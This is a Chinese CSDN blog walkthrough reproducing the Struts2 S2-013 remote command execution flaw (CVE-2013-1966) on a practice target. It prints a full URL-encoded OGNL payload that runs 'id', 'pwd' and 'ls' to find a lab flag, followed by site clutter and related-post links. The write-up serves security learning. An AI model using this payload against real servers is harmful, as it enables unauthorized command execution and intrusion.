2021-10-24

最新推荐文章于 2024-01-09 09:57:13 发布
最新推荐文章于 2024-01-09 09:57:13 发布
阅读量525 收藏
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/susun_cool/article/details/120936697
版权

复现Struts2 命令执行 (CVE-2013-1966)漏洞

1、打开靶场,访问漏洞URL

http://118.193.36.37:17771/

2、点击该链接
在这里插入图片描述
3、利用Hackbar拼接payload
Payload如下:

?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('cloudscannertest%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

在这里插入图片描述
4、效果如下
在这里插入图片描述
5、查看当前目录,将此处改为pwd
在这里插入图片描述
结果如下:
在这里插入图片描述
6、继续修改此处,将其改为ls ../../../tmp,得到flag
在这里插入图片描述
在这里插入图片描述

小鸣同学¹
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【Vulfocus解题复现】Struts2 S2-013 Struts2 远程命令执行漏洞 (CVE-2013-1966)
温氏效应
09-04 2614
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEPa
python 拼接param 生成所需的 url
nongcunqq的博客
04-25 544
base_url }?base_url }?base_url }?base_url }?base_url }?base_url }?base_url }?base_url }?base_url }?url }?url }?url }?url }?url }?
从文档导入单号进行物流查询
nhzgmn的博客
07-26 613
互联网时代大家都在享受科技带来的便利,年轻人经常会网购,而网购的商品基本都是通过快递来送达,那么面对那么多的单号,该如何快速查询物流呢
快速在多个快递单号中筛选出未签收查看它们的更新量
m0_61166673的博客
02-17 431
当拥有快递单号需要查询的时候,如何查询呢?下面给大家分享一个查询快,查询多,更方便分析物流的方法。下面一起来看操作方法。 准备工具: 安装快递批量查询高手(到这个网址上去下载软件www.dnrjz.com) 多个单号 开始查询: 进入到软件中,点开“添加单号”的这个功能 在弹出的对话框中,导入需要查询的快递单号和公司名称并保存 保存后软件会自动跳转到主界面上,开始查询单号物流 全部查询完成后,物流信息都会一个一个显示出来 然后打开“查看方式”菜单,点开“未签收记录”选项 将此批单号中未签收的单号全
【青龙面板】米游签到教程
m0_65153447的博客
04-26 1660
config.json.example文件复制到/data/alpine/ql/scripts/Womsxd_AutoMihoyoBBS/config/,没有config文件夹就在里面创建一个,并把config.json.example改名为config.json。1:青龙拉库 ql repo https://github.com/Womsxd/AutoMihoyoBBS.git。2:打开文件夹,把/ql/repo/Womsxd_AutoMihoyoBBS/config/手动注释地31-34行。
量产工具-一芯-FirstChip FC1179量产工具FirstChip Mptools 2021-10-24
06-22
本话题聚焦于FirstChip(一芯)的FC1179量产工具——FirstChip Mptools 2021-10-24版。 FirstChip是一家专注于存储控制器研发的厂商,其产品广泛应用于各类存储设备。在这款工具中,"chipYC2019"是FirstChip公司...
2021-africanews24-7
03-12
【标题】"2021-africanews24-7" 暗示这是一个与非洲新闻相关的资料集合,可能是新闻报道、数据集或者是新闻站点在2021年全年的内容汇总。由于标题简单直接,我们可以推测这可能是一个专注于非洲新闻的24小时不间断...
金融时报-2021-10-23&24.pdf
11-16
金融时报-2021-10-23&24.pdf
2021-2022收藏的精品资料互联网考试答案.doc
12-17
标签为“2021-2022收藏的精品资料”,暗示这份资料是针对2021至2022年间的一个学习资源,可能是某个课程或认证考试的复习材料。 根据部分内容,我们可以看到一系列的问题和选项,但没有明确的答案。这些题目涉及了...
ES-2Sem-2021-Grupo24
03-14
"ES-2Sem-2021-Grupo24-master" 文件名可能表示这是项目的主分支或源代码仓库。 在Java编程中,我们涉及的知识点广泛且深入,包括但不限于: 1. **基础语法**:Java是一种面向对象的语言,它包括类、对象、封装、...
Jsp页面在URL中传递参数会出现乱码问题解决
11-23
Jsp页面在URL中传递参数会出现乱码,本人想到两种方法解决,虽然不能保证100%解决,但值得学习
C++ 内联函数详解
花言的博客
08-20 1104
内联函数的一些笔记
S2-013远程执行代码(CVE-2013-1966)
最新发布
m0_65150886的博客
01-09 427
Struts2标签库中的url标签和a标签的includeParams这个属性,代表显示请求访问参数的含义,一旦它的值被赋予ALL或者GET或者POST,就会显示具体请求参数内容。按照正常的需求,把参数urlEncode一下也就够了, 问题在于,struts把参数做了OGNL解析,导致OGNL表达式的执行。​ <s:a>includeParams=“all”>Click here.</s:a>,这个是struts2标签库的a标签,该标签会在页面上显示当前URL。控制整个网站甚至控制服务器进一步内网渗透。
Android 6.0 动态权限实战(一)------ Nexus7二代(WIFI版)4.4升级6.0-附带纯净刷机ROM福利!
Engineer-Jsp的专栏
12-08 6051
Android 6.0 动态权限实战(一)------ Nexus7二代(WIFI版)4.4升级6.0-附带纯净刷机ROM福利!
Django学习7:模型(models)
喜欢海
11-21 1020
模型概述Django对各种数据库提供了很友好的支持,统一的调用API,我们可以根据自己不同的业务需求选择不同的数据库。配置数据库__init__.py import pymysqlpymysql.install_as_MySQLdb()settings.py # 修改DATABASES { 'default':{ 'ENGINE':'django.db.backends.my
web-app 4.0 web.xml备忘
lianjunzongsiling的博客
03-24 4263
web.xml 4.0版本的备忘 &amp;lt;web-app xmlns=&quot;http://xmlns.jcp.org/xml/ns/javaee&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xsi:schemaLocation=&quot;http://xmlns.jcp.org/xml/ns/javaee http://xmlns.j...
Struts2_013_RCE CVE-2013-1966 漏洞复现
ADummy的博客
02-04 1604
Struts2_013_远程代码执行 by ADummy 0x00利用路线 ​ 直接url执行payload,由于浏览器url输入框的长度有限,可以使用Hackbar插件,或burpsuite抓包测试。 0x01漏洞介绍 ​ <s:a>includeParams=“all”>Click here.</s:a>,这个是struts2标签库的a标签,该标签会在页面上显示当前URL Struts2标签库中的url标签和a标签的includeParams这个属性,代表显示请求访
路由url里多了%7D是怎么回事?
weixin_47486326的博客
03-11 3012
根据url编码表,%7D是 }(右花括号) 问题在于前端html文件中 右侧多写了个 } 是个小错误,改掉就好了
HackBar 使用教程
qq_53058639的博客
01-10 4012
方法二:开始与方法一相同,找到“hackbar-panel.js”文件,打开此js文件,选择42、45、52处,将这三处的代码disable_hackbar();,按Ctrl+S保存代码。这个插件是用 webextension 编写的,是原始 Hackbar 的 XUL 版本的替代品。Hackbar是一个Firefox的插件,它的功能类似于地址栏,但是它里面的数据不受服务器的相应触发的重定向等其它变化的影响。3.找到其目录下的js文件下的 “hackbar-panel.js”文件,然后打开此js文件。
js中如何将2021-10-24 16:40:05转换为数字
06-02
如果你希望将 "2021-10-24 16:40:05" 转换为数字,可以使用 JavaScript 中的 Date 对象。Date 对象可以将日期字符串转换为时间戳,时间戳是一个数字,表示从 1970 年 1 月 1 日 00:00:00 UTC 到指定日期的毫秒数。 可以使用如下代码将日期字符串转换为时间戳: ``` var timestamp = new Date('2021-10-24 16:40:05').getTime(); ``` getTime() 方法返回时间戳,可以将其存储在一个变量中,或者直接使用它进行后续计算。 需要注意的是,以上方法得到的是UTC时间戳,如果需要得到本地时间戳,可以使用 Date 对象的 getTimezoneOffset() 方法进行调整。例如: ``` var date = new Date('2021-10-24 16:40:05'); var localTimestamp = date.getTime() - date.getTimezoneOffset() * 60 * 1000; ``` 上述代码中,getTimezoneOffset() 方法返回当前时区与 UTC 时间之间的分钟差,需要将其转换为毫秒数后进行计算。本地时间戳 = UTC时间戳 - 时区差。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值